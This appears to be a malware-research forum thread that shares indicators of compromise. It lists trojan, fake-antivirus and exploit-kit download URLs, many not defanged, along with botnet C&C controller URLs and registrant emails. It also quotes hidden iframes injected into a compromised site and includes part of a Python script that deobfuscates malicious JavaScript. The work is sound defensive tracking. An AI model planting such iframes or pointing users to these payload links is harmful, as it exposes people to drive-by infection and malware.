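# unescape('<iframe src=\'' + b24 + '\'>') is left alone because it is already readable.
UNESCAPE_RE = re.compile(r"""unescape\(\s*(["'])([^"']*)\1\s*\)""")
FROMCHARCODE_RE = re.compile(r'String\.fromCharCode\(\s*([0-9,\s]*)\)')
# eval() is unwrapped only when it is the whole statement, so nothing gets spliced mid-code.
EVAL_RE = re.compile(r"""eval\(\s*(["'])(.*)\1\s*\)\s*;?""", re.DOTALL)
URL_RE = re.compile(r"""https?://[A-Za-z0-9.-]+(?:/[^\s'"<>)]*)?""")


def js_unescape(s):
    """Mimic JavaScript's legacy unescape(): %XX and %uXXXX sequences only."""
    return PCT_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def js_string_literal(s):
    """Render a decoded string as a double-quoted JS literal so the layer stays readable."""
    return '"' + s.replace('\\', '\\\\').replace('"', '\\"') + '"'


def js_unquote(s):
    """Reverse js_string_literal(): drop the backslash in front of every escaped character."""
    return re.sub(r'\\(.)', r'\1', s)


def peel(src, max_rounds=8):
    """Return the successive layers, outermost first; the last one is as plain as this gets."""
    layers = [src]
    for _ in range(max_rounds):
        cur = layers[-1]
        nxt = UNESCAPE_RE.sub(lambda m: js_string_literal(js_unescape(m.group(2))), cur)
        m = EVAL_RE.fullmatch(nxt.strip())
        if m:                       # the string handed to eval() is the next layer of code
            nxt = js_unquote(m.group(2))
        nxt = FROMCHARCODE_RE.sub(
            lambda m: js_string_literal(''.join(chr(int(c)) for c in m.group(1).split(',') if c.strip())),
            nxt)
        if nxt == cur:              # no wrapper left that we know how to remove
            break
        layers.append(nxt)
    return layers


def extract_urls(layers):
    """Collect every http(s) URL visible in any layer, in first-seen order."""
    seen = []
    for layer in layers:
        for url in URL_RE.findall(layer):
            if url not in seen:
                seen.append(url)
    return seen


if __name__ == "__main__":
    for name, sample in (("style", SAMPLE_STYLE), ("iframe", SAMPLE_IFRAME), ("onfocus", SAMPLE_ONFOCUS)):
        layers = peel(sample)
        print(f"== {name}: {len(layers)} layer(s)")
        print(layers[-1])
        print("urls:", extract_urls(layers))
```

The iframe sample peels to `var b24 = "http://dastrealworld.ru/denunreal.html";document.write(...)`, i.e. the same redirect the post recovered by hand; the same loop unwraps the eval(String.fromCharCode(...)) form of the referer-check script once its number list is pasted in as the sample.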
-
I actually can download it directly (
http://antvirushelpv1.com/download.php?id=2004)
-
You can, or can't?
/edit
It was the .js file on the domain that redirs to the rogue domain I had to supply the Google referer to btw, not the rogue domain ;)
-
You can, or can't?
/edit
It was the .js file on the domain that redirs to the rogue domain I had to supply the Google referer to btw, not the rogue domain ;)
;D
-
Redirects to exploits:
popyodiw.cn/s/in.cgi?10
Koobface:
123.199.89.28/setup.exe
Trojan:
ji-u.cn/506.exe
http://www.virustotal.com/analisis/9c37779c08a666084c8088a42b44bbf6
Trojan:
claremontfinance.org/voland.exe
http://www.virustotal.com/analisis/970e0653980bb5313e6f9bbf82b32cc7
Trojan:
photo-host.in/new/exe/5555.exe
http://www.virustotal.com/analisis/bc8cb44f6b8046208e130186e4b78098
Trojan:
091809.ru/main_.exe
http://www.virustotal.com/analisis/d82a419082bfcf5c716bb6388f3c9ad1
Trojan:
buzizoo2.com/15.05-fuck.exe
http://www.virustotal.com/analisis/b42234e7210ce0192855eb43c3121b49
Trojan:
213.171.222.30/codec.exe
http://www.virustotal.com/analisis/14e090fe72f0114a4181d7d0d1b5b8fd
-
exploits
numbersbulk.cn/in.php
http://wepawet.cs.ucsb.edu/view.php?hash=ac1e4c06e172e7e6d75c8ac4c7ebb81d&t=1242647454&type=js
trojan
numbersbulk.cn/load.php?id=5
http://www.virustotal.com/analisis/1b81c4c3f26c3b88d3721b61b0fe8f14 7/40
-
Exploit/trojan:
pimpalas.cn/yespdf/index.php
http://wepawet.iseclab.org/view.php?hash=d8776172d856e083138ff2828f1c28ae&t=1242712689&type=js
Redirect to fake AV:
gogenscan.com
gozonescan.com
Fake AV:
fanscan4.info
miniscan4.info
scanlist6.com
luxscan4.info
-
pearch.net/in.cgi?7
redirects to
europpc.com/search.php?iw=1&links=
links redirect to
wplstr.net/in.cgi?20
redirects to fake system check
systemstabilityscan.com/5
starts download
http://adioro.com/download.php?aid=5
redirects to
dl1.adioro.com/get.php?track_id=5
downloads
dl1.adioro.com/distribs/5/registryoptimizer.exe
http://www.virustotal.com/de/analisis/99110a3a11c3cba50d7725b2453813ec 0/40
MD5...: fcd4b853dcea9d412fab09c66134058a
-
72.47.253.37
redirects to exploits:
hxxp://findbigbrother.cn:8080/ts/in.cgi?pepsi6
hxxp://bestwebfind.cn:8080/ts/in.cgi?pepsi11
hxxp://findyourbigwhy.cn:8080/ts/in.cgi?pepsi7
hxxp://findbigboob.cn:8080/ts/in.cgi?pepsi6
Wepawet (http://wepawet.iseclab.org/view.php?hash=ebb1fe9522a585973be68f770635d2dd&t=1242748332&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=1546ed48bdf651718cfd0174a82b6efb&t=1242685229&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=af9e734c0b248533c0f9075629d7f628&t=1242687499&type=js)
The latest has no report (too many submissions to wepawet for hours)
-
redirects to exploits
91.212.41.119
hxxp://silzefos.cn/s/in.cgi?13
Wepawet (http://wepawet.iseclab.org/view.php?hash=ac168dc0c36f802d46ca35394f32d439&t=1242719638&type=js)
Registrant: Meng Qun / janglkd@ yeah.net
exploits / trojan
221.5.74.52
hxxp://profit-marketing.net/earningn/t.php
hxxp://profit-marketing.net/earningn/ll.php?b=2&s=snaj
hxxp://profit-marketing.net/earningn/ll.php?b=1&s=Co11ab
hxxp://profit-marketing.net/earningn/ll.php?b=1&s=ODAY
hxxp://profit-marketing.net/earningn/ll.php?b=1&s=Ut1l
hxxp://profit-marketing.net/imocs.swf
hxxp://profit-marketing.net/inocs.pdf
Registrant: Michell.Gregory2009@ yahoo.com
Wepawet (http://wepawet.iseclab.org/view.php?hash=c813e5a5f4a61be58a0e14d1d805d78e&t=1242583611&type=js) (exploit)
VirusTotal (http://www.virustotal.com/analisis/664aeb722b7908da6cbd8d75c472feb2) (flash) - 3/39 (7.69%)
Wepawet (http://wepawet.iseclab.org/view.php?hash=349deac830735bacff1d9d14c159498f&type=js) (flash)
VirusTotal (http://www.virustotal.com/analisis/9153dbcad1da90126ef4cb18b2507693) (pdf) - 7/39 (17.95%)
VirusTotal (http://www.virustotal.com/analisis/fdbf2a14b8135705d740bc9ffa931074) (exe) - 3/39 (7.69%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=15a74956aa17d20f49dfd3c701287cc93&call=first)
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=aa09ec5696ee8105d36a31d370d3a606)
Botnet C&C:
213.182.197.249
hxxp://krottorot.cn/ging/controller.php?action=bot&entity_list=&uid=&first=1&guid=1824245000&rnd=946862
hxxp://krottorot.cn/ging/controller.php?action=report&guid=0&rnd=946862&uid=&entity=1241486361:unique_start
Source: Anubis (http://anubis.iseclab.org/?action=result&task_id=15a74956aa17d20f49dfd3c701287cc93&call=first)
Registrant: Chen / chen.poon1732646@ yahoo.com
Botnet C&C:
78.129.166.5
hxxp://ftpshki.cn/admin/controller.php?action=bot&entity_list=&uid=1&first=1&guid=1824245000&rnd=2514213
hxxp://ftpshki.cn/admin/controller.php?action=report&guid=0&rnd=25142137&uid=1&entity=1238216956:unique_start
hxxp://ftpshki.cn/admin/receiver/online
Source: Anubis (http://anubis.iseclab.org/?action=result&task_id=1c8ae7bb70a466f64d5ed8f74df829bfe&format=html)
Registrant: SmithJohn / Chehhost@ admin.ru
-
91.209.163.201 - vl01.c76.fvtn.net
hxxp://download.official-emule.com/Live-Player_setup.php
hxxp://download.original-solitaire.com/Live-Player_setup.php
91.209.163.202 - vl02.c76.fvtn.net
hxxp://download.go-turf.com/Live-Player_setup.php
hxxp://download.gomusic.com/Live-Player_setup.php
hxxp://download.littlesmileys.com/Live-Player_setup.php
hxxp://download.official-bittorrent.com/Live-Player_setup.php
hxxp://download.schnellsucher.com/Live-Player_setup.php
hxxp://download.search-solver.com/Live-Player_setup.php
hxxp://download.smilymail.com/Live-Player_setup.php
hxxp://download.trovarapido.com/Live-Player_setup.php
hxxp://download.web-mediaplayer.com/Live-Player_setup.php
91.209.163.203 - vl03.c76.fvtn.net
hxxp://download.backstripgirls.com/Live-Player_setup.php
hxxp://download.buscalisto.com/Live-Player_setup.php
hxxp://download.games-attack.com/Live-Player_setup.php
hxxp://download.go-astro.com/Live-Player_setup.php
hxxp://download.gomusic.net/Live-Player_setup.php
hxxp://download.hot-tv.com/Live-Player_setup.php
hxxp://download.speed-downloading.com/Live-Player_setup.php
same file:
File size: 233000 bytes
MD5: 67a6bfee47f1e6c7d1c03d8c02df6b95
VirusTotal (http://www.virustotal.com/analisis/d01ac3e0cd1e08afc94cf0f79bd34489) - 12/40 (30%)
Registrant: Ramon Viladomiu / 2ffba9ee4ff19e8587163b873c03ff22-913471@ contact.gandi.net
related to: http://www.siteadvisor.com/sites/live-player.com
-
filesstoragesarchive.com/softwarefortubeview.42002.exe
http://www.virustotal.com/analisis/e28f31c90582938ebfb7674f6136ad80 3/40
http://www.threatexpert.com/report.aspx?md5=f15dd0112f6f77dbce18d349dd65af79
-
Emold:
ku98.biz/ghost/dia.exe
http://www.virustotal.com/analisis/6e833596122310890ab85283b612aa02
Trojan:
rezident77.ru/files/cry.exe
http://www.virustotal.com/analisis/860b0c60fcc25b00b58075cff3492cd8
Koobface:
121.13.55.49/setup.exe
79.181.99.78/setup.exe
-
Trojan:
samog0n.info/analyse/3xNt0f6b9e3R.exe
http://www.virustotal.com/analisis/3f6196088309178a7ced521f2ac381c0
Trojan:
tamporn.net/indir.exe
http://www.virustotal.com/analisis/33ac4a6f5025b70f407812c3637cb084
Trojan:
yourelitehosting.ru/explorer.exe
http://www.virustotal.com/analisis/b8fcb40a031230efbfaa9b3e0ff6e8a9
Redirects to rogue:
spyware-systems.info/0/go.php?sid=2
Exploit/trojan:
dr-w-corporation.ru/404/cache/readme.pdf
http://wepawet.iseclab.org/view.php?hash=ceda3c3478def91606b1f1eff10aee05&t=1242931942&type=js
-
redirects:
hxxp://tvnameshop.cn:8080/ts/in.cgi?pepsi19
exploits:
hxxp://litetopseeksite.cn:8080/index.php
Wepawet (http://wepawet.iseclab.org/view.php?hash=11608bcd2beae11a346c7ce59dc1b66a&t=1243207563&type=js)
pdf:
hxxp://litetopseeksite.cn:8080/cache/readme.pdf
VirusTotal (http://www.virustotal.com/analisis/e0cc1067f80918d270ff280f5118f8d4c5d1f59a99ce9329aadafa8c859e8e0c-1243207236) - 10/40 (25.00%)
Wepawet (http://wepawet.iseclab.org/view.php?hash=95c738bfe5a01b4cc30415d9368e2f9d&t=1243207896&type=js)
flash:
hxxp://litetopseeksite.cn:8080/cache/flash.swf
VirusTotal (http://www.virustotal.com/analisis/1feb0cc84665dfab4ebf8bf123ea106cbefc0967e7d0446a003c4411a5d4b42f-1243207241) - 11/39 (28.21%)
exe:
hxxp://litetopseeksite.cn:8080/load.php
VirusTotal (http://www.virustotal.com/analisis/284a014530738b8df40ad37d145eb3e1a547e51cb47461ee469269fa4df12fcb-1243207094) - 2/39 (5.13%)
Registrant: Scott Bell / ScottKBell@ missiongossip.com
Registrant: Michelle Rea / rea@ cybernauttech.com
-
Few trojans:
contempt.fileave.com/update.exe
http://www.virustotal.com/analisis/a9611719a2debd0ce94827725344b924b59a7dceb3b88a5a7373e63b21ea3a4a-1243232016
contempt.fileave.com/install_flash_player.exe
http://www.virustotal.com/analisis/7a0c6497ed0fedc5eb92b63f7c79d9f6fddaf93d6dcc92bb8c869bc9da354aa9-1243232028
contempt.fileave.com/update!!.exe
http://www.virustotal.com/analisis/eb6312bd3a633c4dc29bd3c6a8ed818034da1f9b619ef71e0beb549c4560dea8-1243232049
ebnetwork.biz/bot.exe
http://www.virustotal.com/analisis/36e867e35665340c782c1d029d4f812e78a2c1b9b06c8f65e11aa4ecf249efc2-1243232229
Koobface:
82.120.80.136/setup.exe
72.26.145.118/setup.exe
Exploit/trojan Murlo:
usrvzi.ru
http://wepawet.iseclab.org/view.php?hash=07cb0602a03e0538ce9e630d5881e8d2&t=1243233325&type=js
Fake AV loader:
stroika2009.ru/porn-tube.avi.exe
http://www.virustotal.com/analisis/15d4ed789d3872463614ff54804ddebc07ae67ea6ab44efd80937ede4f33191d-1243233171
Fake AV:
pornotubeonline10.com/scan/
Fake payment site:
2payon.com/pp/?id=356
-
Trojan Emold:
interepass.com/ldr/main.exe
http://www.virustotal.com/analisis/49925c768805484b4fcd2eb62d0d72765b7b40c62cbe6cceaad4d2187eaac444-1243317300
Trojan:
89.149.242.25/cc/rf5.exe
http://www.virustotal.com/analisis/6626bc1283eb86b9afdf73ee4a24be67734fb0be1c81dda3e7d3731f77064c30-1243311118
Trojan:
us18.ru/d/1.exe
http://www.virustotal.com/analisis/21c89616b4b86dff6e1edf71c301a516b0dd477811bf7398a38743868a24e7db-1243311158
Trojan:
pizdhelp.com/codec.exe
loyalbox.biz/codec.exe
http://www.virustotal.com/analisis/3f952397ee3a0fab7f828977e96d278be7e60f43de6f495c1fb7e7579cfcf616-1243317473
Fake av scan:
porno-online-tube.com/scan/
note4scan.info
greattoolset.com
Fake AV:
dwnld.showpromo-offer.com/secure/069d079c64e0350e7ba812895655fbf0/4a1b65bd/srm/srm_free_setup.exe
http://www.virustotal.com/analisis/af072ce2b07e627e27035e85bfd0ab74ac9de16b8166ef40d4b11455ecbe1b7e-1243317795
Redirects to fake AV:
trafdriver.com/in.cgi?10
Exploit/trojan:
freehostwap.com/in.php
http://wepawet.iseclab.org/view.php?hash=d89affb2687f08a4310d2e29a79d0b0f&t=1243320248&type=js
-
PDF:
http://92.60.176.45/s/getfile.php?f=pdf
[5/39]
http://www.virustotal.com/analisis/c958c661bc404cd8f82ccad7143b82937eeebafd27226e80feef3b5ddd92ec99-1243341305
Trojan/dropper:
http://92.60.176.45/s/getexe.php?h=1
[7/39]
http://www.virustotal.com/analisis/e1b5d1b5c13891d274ec6fe17a405ec234a2368b2ee5720c4d53a508ff359465-1243341362
-
Rogue Application related domains:
Angantivirus09.com
Ang-antivirus09.com
Angantivirus09.info
best-protect-av1.info
download.best-protect-av1.info
securityonlinesite.com/hitin.php?land=20&affid=20100
-
Exploit/trojan:
leosex.org/nn/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=eb94cbec20844957ee85c8e95f272dfc&t=1243391424&type=js
Trojan (seemed like Virut to me):
ileron.cn/dll/abb.txt
http://www.virustotal.com/analisis/452e31c95952af674501a0519e63741568a1a3ba6267abc559b461812d761b70-1243392178
Trojan:
ileron.cn/dll/em.txt
http://www.virustotal.com/analisis/9b9871886640affa7fa13ebcb404540b10c862c9bf88372b184060f8eb2d1c37-1243392469
-
Fake AV:
truesafetyweb.com
securityonlinesite.com
-
70.85.142.250 - fa.8e.5546.static.theplanet.com
redirects:
thefilmmusic.cn:8080/ts/in.cgi?pepsi16
mynewnameshop.cn:8080/ts/in.cgi?pepsi25
usednamestore.cn:8080/ts/in.cgi?pepsi23
namebuyfilmlife.cn:8080/ts/in.cgi?pepsi23
mediahomenameshoppicture.cn:8080/ts/in.cgi?pepsi17
homenameworld.cn:8080/ts/in.cgi?pepsi17
technologybigtop.cn:8080/ts/in.cgi?pepsi17
exploits / trojan:
litetopdiscoversite.cn:8080/index.php
litetopdiscoversite.cn:8080/load.php
litetopfinddirect.cn:8080/index.php
litetopfinddirect.cn:8080/load.php
-
PDF exploit:
cutlot.cn/cache/readme.pdf
http://wepawet.iseclab.org/view.php?hash=175471e264f45086cc76d243f2d434da&t=1243755537&type=js
Flash exploit:
cutlot.cn/cache/flash.swf
http://wepawet.iseclab.org/view.php?hash=b3b47f2539fcd19831f1b69463f463aa&type=swf
the downloaded trojan (0 detections on VT):
bestlitediscover.cn:8080/landig.php?id=8
http://www.virustotal.com/analisis/cbdc2ddd3d050e55863f645efe12a3b55abec042a8d4f638788669e6431683b3-1243839114
communicates with
78.109.29.116/new/controller.php?action=bot&entity_list=&uid=1&first=1&guid=606178701&rnd=981633
(on MDL)
www.zbbey.com/n/
http://wepawet.iseclab.org/view.php?hash=47f6d25611621daf759de1bf372b9633&t=1243757577&type=js
PDF exploit:
www.zbbey.com/n/spl/pdf.pdf
http://wepawet.cs.ucsb.edu/view.php?type=js&hash=15b110fd28204a9b64716abda5cd6db5&t=1243757463
the downloaded trojan:
zbbey.com/n/exe.php
http://www.virustotal.com/analisis/11d539235f368547b20854cbbcfadee90c4c71d4c8a9e78fa6f6011b30f3f423-1243850579
Few trojans:
www.mcdonaldsuck.com/e/eg.exe
http://www.virustotal.com/analisis/6471bb8364de0ffc7775daa615631d226030280bcd4b8da40cb6ad8058e7b8b2-1243840368
www.mcdonaldsuck.com/e/sb.exe
http://www.virustotal.com/analisis/6ab0ac53f3c91abe493b9423fe71bb6f57ba728a9dd7f888d85ed117c4fe78ca-1243840496
www.mcdonaldsuck.com/e/238.exe
http://www.virustotal.com/analisis/097d7a0907216b6395f4e88a3b847cb15a17f4166367a7c2b42518dd3a4c8836-1243840661
www.mcdonaldsuck.com/e/ick.exe
http://www.virustotal.com/analisis/51f7ed9fa7f032ab1fd3acf7fc2eef55c62b15128b46d697405d67778093286a-1243840855
www.mcdonaldsuck.com/e/lich.exe
http://www.virustotal.com/analisis/ac62cbe52183d6f60f683548dde10dd1ba814fcab8ccc6aa3beadfb646c46bb7-1243841074
sotana.su/1.exe
http://www.virustotal.com/analisis/cb70d5e0ba1425ca49142a598528617846834aab9129677060d3568485d69080-1243841368
sexiland.ru/1.exe
http://www.virustotal.com/analisis/2a6c671dad587a06a18e751a3f22a0eb1659f73f915ec307dd65e2d59a5ae3c2-1243841184
sexiland.ru/bot.exe
http://www.virustotal.com/analisis/dc9913c8a788ce33a063de0f8d73c0e214eef3c6e63fc7a99fb8eff007f0cf06-1243841240
claremontfinance.org/voland.exe
http://www.virustotal.com/analisis/fc2c189b3242075ee4944afd6f4b60b7852dd73eea412ee20366cb082b16340d-1243841664
business-networks.info/data/images/ftp.exe
http://www.virustotal.com/analisis/eaa2a177b4e1b711b536a965bdf4bb1ba1eead4fca275dce6b124d5b87e9b824-1243841813
89.149.242.25/ededed3.exe
http://www.virustotal.com/analisis/76ef1bbe110c8ff041db0c67895d551769e9b85f08780c1242c6a2cc4026cdce-1243839486
Redirects to fake AV:
unmarine.info
powerball.3june2009.com
Fake AV:
counteringate.com/scan
loved-online-tube.com/scan/
first-antispyware.com/promo3/
the-best-antispyware.com/promo3/
-
Exploits:
search-adverts.net/forum/index.php
http://wepawet.iseclab.org/view.php?hash=f2974b1a652fd3bc3fac456d5175e1ab&t=1243847198&type=js
PDF:
search-adverts.net/forum/cache/readme.pdf
Flash:
search-adverts.net/forum/cache/flash.swf
Koobface:
search-adverts.net/forum/load.php?id=4
http://www.virustotal.com/analisis/199690f5a30c1d9ff7d267cce6f7bab4b98195bdc8963a40c03f5146163a96a9-1243504185
-
Rogue:
clean-windows-vista.com
registry-cleaner-2009.com/Setup.exe
Internet-explorer-cleaner.com/Setup.exe
registrycleanerpro.org/Setup.exe
http://www.virustotal.com/analisis/fa7bcca65a1c661f93a0a2d1031162e12a4c27d86f49686e65a02d40762f74f8-1243909438 (1/40)
The payment site (site seems legit and just offers its services):
plimus.com/jsp/buynow.jsp?contractId=2261798&templateId=678656
-
Few Trojans:
avhtm.8866.org/files/av.exe
http://www.virustotal.com/analisis/969c0f517f279dd68898eea50bb9ce51092acc3eca79fe963500b82f5c0d222a-1243923005
091809.ru/bot.exe
http://www.virustotal.com/analisis/eabf8925b5e73d4a8c1ef091108c2144a506f953c2e392588d2b5c05189dc698-1243924307
Trojan Koobface:
videofx4you1.com/software/019d135faa/10180/1/Setup.exe
http://www.virustotal.com/analisis/e585df3a2b91e56951ecd6a03c73fd7b45b02e0ca2278130438b6467e823e202-1243924387
ultraphobia.com/ppcfile/godsname.exe
http://www.virustotal.com/analisis/8018cf6b613911e75f0a9f326bb4d18b86f3543cab781b21fa49893483c37804-1243924788
ultraphobia.com/ppcfile/freeserfer.exe
http://www.virustotal.com/analisis/da4177f7cec2b60dae6e7d67944b5ff54273c6d70549d63c4c6de584abece4a6-1243924927
Trojan Pinch:
treelives.cn/pnc/pexe.exe
http://www.virustotal.com/analisis/c0deb27bd735c3936bd84bd67d60b3c5450bffb6f051eb170370afb965a0dad1-1243925125
Exploits:
s76z.cn/data/
http://wepawet.iseclab.org/view.php?hash=7bb7e6ca87c21a4310f276e54db9e102&t=1243847990&type=js
PDF:
s76z.cn/data/spl/pdf.pdf
Trojan Oficla:
s76z.cn/data/exe.php
http://www.virustotal.com/analisis/02c22fc3cd292700557f0a125a544225a51839754f3ad886ba38788f8e5aaa3f-1243815948
Exploits:
treelives.cn/ru/index.php
http://wepawet.iseclab.org/view.php?hash=db13b96a3f07c2433da03c406fa21000&t=1243849201&type=js
PDF:
treelives.cn/ru/iepdf.php?f=new
Trojan oficla:
treelives.cn/ru/load.php
http://www.virustotal.com/analisis/bcb7eb7c10a161a08a16249e653bfcd0c26ac97941ac5760525c27edadf383d8-1243796149
-
iframe directs to pfre.php
lgmin.com/image/index.php
pdf exploit
lgmin.com/image/pfre.php
payload is
http://lgmin.com/image/ouet.php
http://www.virustotal.com/analisis/27b6a8bd0b5ccdd6d621cec888108f6c4f6f809319fad724f5c6f1aa94124a39-1243963662 3/40
CAT-QuickHeal 10.00 2009.06.02 (Suspicious) - DNAScan
Microsoft 1.4701 2009.06.02 VirTool:Win32/Obfuscator.FH
Symantec 1.4.4.12 2009.06.02 Suspicious.MH690.A
http://www.threatexpert.com/report.aspx?md5=995a4928b9d1da62bcda2c1db6dd4898
AdPack cpanel is
lgmin.com/image/admin.php
same kind of stuff can be found at fastinate.com/image/...
-
Sites related Rogue Security Application
http://deluxe-protector.com/setup.exe
http://softwaredownloadcentercom.com/xpdel.exe
http://liveicqnetwork.cn/go.php?id=2018&key=56d5f0bd3&p=1
http://pricelessfinish.cn/go.php?id=2018-04&key=56d5f0bd3&p=1
http://pro-antivirus-scannerv2.com/1/?id=2018&smersh=c144eb244&back==TQ0yzz5McQNMI=M
http://safetywww.com/hitin.php?land=20&affid=20100
http://personal-antivirus-software.com/promo3/?aid=851
-
directs to "Messenger Infium" (trojan)
msnm.3eu.ru
albatros.ee/uploades/scr_dn/MInfium2009Final.exe
http://www.virustotal.com/analisis/9075621fd2b778431b576b9fef8ece2af86ff98f2f1516b62078f26b700f17c2-1244062941 2/40
K7AntiVirus 7.10.752 2009.06.02 Trojan.Win32.Malware.1
TheHacker 6.3.4.3.338 2009.06.03 Trojan/Agent.cikm
-
Exploit (wepawet seems to fail on this one):
091809.ru/s/in.php
PDF:
091809.ru/s/pdf.php
http://wepawet.iseclab.org/view.php?hash=f5b00bed476324a303df8f4b4d8ac8c1&t=1244100976&type=js
seems like a bit altered variant of the Emold trojan:
091809.ru/s/load.php?id=3
http://www.virustotal.com/analisis/05e9c38100c6d59e834be1b848ab824eefe741d358e969d5e11cf6853d6ab7f5-1244100358
FTPstealer:
club25plus.de/css/vv.exe
http://www.virustotal.com/analisis/1db0daee62d2103eab7c84383e05505b6d6612aaef14da7641f1ceabd6d2f65a-1244101252
Trojan:
club25plus.de/css/frfr5.exe
http://www.virustotal.com/analisis/e8165bde7ebbcd65464ee27f7121128885e91b373ce83a3adb53e1e1975ec5d8-1244101967
Fake AV:
tubepornolive.com/scan/
Exploits:
bfegrtuker.ru/bede/in.php
http://wepawet.iseclab.org/view.php?hash=09d36363e30de64fc262c747c8e54d68&t=1244102863&type=js
PDF:
bfegrtuker.ru/bede/its/0.pdf
Flash:
bfegrtuker.ru/bede/its/0.swf
Trojan Oficla:
bfegrtuker.ru/bede/load.php?id=5
Trojan:
000007.ru/1007.exe
http://www.virustotal.com/analisis/b35aec13c9d8d5b92fd3ba42eb753f36a89b1798dfcd1068c62243f9d0e38e04-1244102905
Trojan:
234871938123.cn/svcshostes.exe
http://www.virustotal.com/analisis/80fb3f643f85d8f09f3e5f533a52917dfae9c6e009899602577b6113dabf0ec7-1244103136
Trojans (all seem to be Rustock):
yayandex.com/1.exe
http://www.virustotal.com/analisis/c9ab5cd07f75505444777caebc1ba203c4d6a3cfa079516f5b231f5cbea4cb6c-1244103292
yayandex.com/2.exe
http://www.virustotal.com/analisis/34f7a41324eaaaefd45357ed16f89b8a9add7e839c54fc4897610fc831e56a44-1244103465
yayandex.com/3love.exe
http://www.virustotal.com/analisis/1f0f682ac26bc3c2c3d3153b282e09e68c97277b0dfc49f3a97519d42033410d-1244103873
all communicate with:
yabombs.com/1/getcfg.php
-
Fake/Scare scanner
http://antimalwareliveproscannerv3.com/1/?id=2018&smersh=c144eb244&back==TQ2yTDxNMQOMI=N
Fake flash player - downloads Rogue
http://big-pornnet.com/promo1/get.php?aid=780&vname=flash_player_v11
Couple of links on the rotators
http://top-pornnet.com/promo3/?aid=763&vname=flash_player.exe
http://mybig-portal.com/promo3/?aid=763&vname=protect.exe
-
Fake movie page:
tube-xxx-work.com/xplays.php?id=40016
downloads:
exe-web-development.com/streamviewer.40016.exe
http://www.virustotal.com/analisis/76b8a3599fc04cfe7adecab36805615f82b7e73c8b8980f2ecbb3cd94cee5ba3-1244350815
Fake AV:
mysex-adult.com/promo1/soft/install-1557.exe
Rustock:
rarambler.com/ra/2.exe
http://www.virustotal.com/analisis/a67f6dcc6c43deaa623d88882cf591f742552615cc59cd3620cda86dbbbc618e-1244353129
Communicates with:
systemjud.com/start/admo/getcfg.php
-
Today a user reported the following:
i found these two in my site:
<iframe src="http://85.10.221.161/in.cgi?2" width="0" height="0" frameborder="0"></iframe>
<iframe src="http://global-analitics.com/in.cgi?2" width="0" height="0" frameborder="0"></iframe>
85.10.221.161/in.cgi?2
redirects to multiple exploits at
searchsuggest.cn/catalog/x.php?q=1
payload is
searchsuggest.cn/catalog/q.php?s=2'
http://www.virustotal.com/analisis/ad7686eb5e40fa0b4a874bf06a605f2ed44e6a17a7e7df48c7c25064c42f400a-1243633951
I'm unable to download it from machine, don't know why.
The other url
global-analitics.com/in.cgi?2
doesn't seem to work at the moment.
-
Payload;
/catalog/bookz.pdf
http://www.virustotal.com/analisis/3fcbd6e988183b20a18c13f6125d41bc6ee346c7dd5a198bee4e5de8fdabc927-1244385255
/catalog/next.exe
http://www.virustotal.com/analisis/ad7686eb5e40fa0b4a874bf06a605f2ed44e6a17a7e7df48c7c25064c42f400a-1244385214
I was only able to grab them by feeding it the correct referer (x.php?q=1)
I can't get the other one to work either .....
-
System Security rogue related sites
http://nicleaner.com/hitin.php?land=20&affid=02941
http://nicleaner.com/download.php?affid=02941
http://bestscanjet.com/index.php?affid=09300
http://bestscanjet.com/download.php?affid=09300
http://Dapcleaner.com/hitin.php?land=20&affid=02941
http://dapcleaner.com/download.php?affid=02941
http://sucleaner.com/index.php?affid=02941
http://sucleaner.com/download.php?affid=02941
http://Websecurityread.com/hitin.php?land=20&affid=02941
http://websecurityread.com/download.php?affid=02941
http://Spyscansolution.com/hitin.php?land=20&affid=02941
http://spyscansolution.com/download.php?affid=00000
-
http://e-point.com.ua/ratingz/load.php
Kaspersky - Trojan-Banker.Win32.Banker.aflq
McAfee verdict: PWS-Banker
-
Win PC Defender rogue
http://pornotube911.com/codec/186.exe
http://downloadfixandlove.com/pcdef.exe
http://downloadfixandlove.com/file.exe
Antivirus System Pro
antivir2009pro.com
Inetantivir.com
Inetantivirus.com
Inetavirus.com
209.44.111.57/block.php?r=8.0
-
onlinegames
http://61.160.247.37/xiao/aa1.exe
http://61.160.247.37/xiao/aa2.exe
http://61.160.247.37/xiao/aa3.exe
http://61.160.247.37/xiao/aa4.exe
http://61.160.247.37/xiao/aa5.exe
http://61.160.247.37/xiao/aa6.exe
http://61.160.247.37/xiao/aa7.exe
http://61.160.247.37/xiao/aa8.exe
http://61.160.247.37/xiao/aa9.exe
http://61.160.247.37/xiao/aa10.exe
http://61.160.247.37/xiao/aa11.exe
http://61.160.247.37/xiao/aa12.exe
http://61.160.247.37/xiao/aa13.exe
http://61.160.247.37/xiao/aa14.exe
http://61.160.247.37/xiao/aa15.exe
http://61.160.247.37/xiao/aa16.exe
http://61.160.247.37/xiao/aa17.exe
http://61.160.247.37/xiao/aa18.exe
http://61.160.247.37/xiao/aa19.exe
http://61.160.247.37/xiao/aa20.exe
http://61.160.247.37/xiao/aa21.exe
http://61.160.247.37/xiao/aa22.exe
http://61.160.247.37/xiao/aa23.exe
http://61.160.247.37/xiao/aa24.exe
http://61.160.247.37/xiao/aa25.exe
http://61.160.247.37/xiao/aa26.exe
http://61.160.247.37/xiao/aa27.exe
http://61.160.247.37/xiao/aa28.exe
http://61.160.247.37/xiao/aa29.exe
http://61.160.247.37/xiao/aa30.exe
http://61.160.247.37/xiao/aa31.exe
http://61.160.247.37/xiao/aa32.exe
http://61.160.247.37/xiao/aa33.exe
http://61.160.247.37/xiao/aa34.exe
http://61.160.247.37/xiao/aa35.exe
http://61.160.247.37/xiao/aa36.exe
http://61.160.247.37/xiao/1.exe
-
onlinegames
hxxp://121.12.115.11:886/down/aa01.exe
hxxp://121.12.115.11:886/down/aa02c.exe
hxxp://121.12.115.11:886/down/ts.exe
hxxp://121.12.115.11:886/down/aa03d.exe
hxxp://121.12.115.11:886/down/aa04b.exe
hxxp://121.12.115.11:886/down/aa21g.exe
hxxp://121.12.115.11:886/down/aa05b.exe
hxxp://121.12.115.11:886/down/aa06d.exe
hxxp://121.12.115.11:886/down/aa31b.exe
hxxp://121.12.115.11:886/down/aa08d.exe
hxxp://121.12.115.11:886/down/aa09a.exe
hxxp://121.12.115.11:886/down/aa10d.exe
